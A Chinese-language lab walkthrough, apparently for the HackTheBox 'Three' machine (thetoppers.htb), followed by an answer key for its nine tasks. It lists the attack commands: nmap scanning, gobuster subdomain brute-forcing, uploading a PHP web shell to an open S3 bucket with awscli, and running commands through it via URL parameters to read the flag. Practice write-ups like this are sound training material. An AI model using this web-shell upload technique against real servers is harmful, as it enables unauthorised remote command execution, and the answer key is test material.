扫描
nmap -T4 -Pn -sVC -p- 10.129.27.183开放端口22, 80
访问80 http://10.129.27.183/#contact 找到联系方式 thetoppers.htb
根据提示写入域名到hosts,然后爆破子域名
echo "10.129.27.183 thetoppers.htb" >> /etc/hosts
gobuster vhost -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt -u http://thetoppers.htb/ #耐何没有爆破出来
echo "10.129.27.183 s3.thetoppers.htb" >> /etc/hosts一开始题目提示是 s3.thetoppers.htb
安装AWS客户端
apt install awscli -y
aws configure # 配置
上传shell
aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb #列文件 发现是index.php首页生成php一句话 ,也可以用蚁剑,哥斯拉等工具
echo '' > shell.php
aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb #上传文件执行命令
http://thetoppers.htb/shell.php?cmd=ls
http://thetoppers.htb/shell.php?cmd=ls ../
http://thetoppers.htb/shell.php?cmd=cat ../flag.txt
-
Task 1 How many TCP ports are open?
2 -
Task 2
What is the domain of the email address provided in the "Contact" section of the website?
thetoppers.htb-
Task 3 In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?
/etc/hosts -
Task 4 Which sub-domain is discovered during further enumeration?
s3.thetoppers.htb -
Task 5 Which service is running on the discovered sub-domain?
Amazon S3 -
Task 6 Which command line utility can be used to interact with the service running on the discovered sub-domain?
awscli -
Task 7 Which command is used to set up the AWS CLI installation?
aws configure -
Task 8 What is the command used by the above utility to list all of the S3 buckets?
aws s3 ls -
Task 9 This server is configured to run files written in what web scripting language?
php